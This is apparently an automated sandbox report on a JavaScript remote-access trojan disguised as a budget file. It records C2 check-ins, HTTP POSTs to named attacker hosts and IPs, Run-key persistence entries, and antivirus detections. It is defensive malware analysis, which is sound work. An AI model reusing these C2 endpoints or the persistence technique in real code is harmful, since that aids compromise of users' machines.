popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Financial_Budget2023.js

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 July 12, 2023, 10:01 a.m. July 12, 2023, 10:03 a.m.
Size 2.7MB
Type ASCII text, with very long lines, with no line terminators
MD5 9b5b8fd2b485387fb5e16a6a714ff3c6
SHA256 da4d5278e075f30fc53f3eba042c71b265efa501a52096531abc8d076ca44d6a
CRC32 68A09BF5
ssdeep 24576:a6mrz838IuU0y8OdUS2iFWjQ0NucSdvB7+5IFeKyksIYaXjTzXTR/WCxrmjtkAb4:3
Yara None matched

Name Response Post-Analysis Lookup
jemyy.theworkpc.com
A 109.248.144.235
109.248.144.235
IP Address Status Action
109.248.144.235 Active Moloch
139.177.146.165 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49165 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49173 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49198 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49191 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49198 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49191 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49202 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49202 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49201 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49201 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49194 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49194 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49195 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49195 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 139.177.146.165:4848 2027447 ET MALWARE WSHRAT CnC Checkin Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 139.177.146.165:4848 2017516 ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2748
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0
description wscript.exe tried to sleep 180 seconds, actually delayed analysis time by 180 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 3250861
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250858
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250851
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250851
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250851
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250851
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250851
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250819
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3230170
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3230170
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250767
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250767
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250639
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250639
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250633
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250633
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250633
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250633
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250633
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250633
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250632
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3250632
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Roaming\zYSMEAvCwn.js
MicroWorld-eScan JS:Trojan.Cryxos.12935
FireEye JS:Trojan.Cryxos.12935
VIPRE JS:Trojan.Cryxos.12935
BitDefender JS:Trojan.Cryxos.12935
Emsisoft JS:Trojan.Cryxos.12935 (B)
MAX malware (ai score=82)
Arcabit JS:Trojan.Cryxos.D3287
GData JS:Trojan.Cryxos.12935
ALYac JS:Trojan.Cryxos.12935
wmi select * from win32_logicaldisk
host 139.177.146.165
Time & API Arguments Status Return Repeated

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://jemyy.theworkpc.com:5401/Vre
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /Vre
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

InternetCrackUrlW

 url: http://139.177.146.165:4848/is-ready
flags: 0
1 1 0

HttpOpenRequestW

 connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Financial_Budget2023 reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Financial_Budget2023.js"
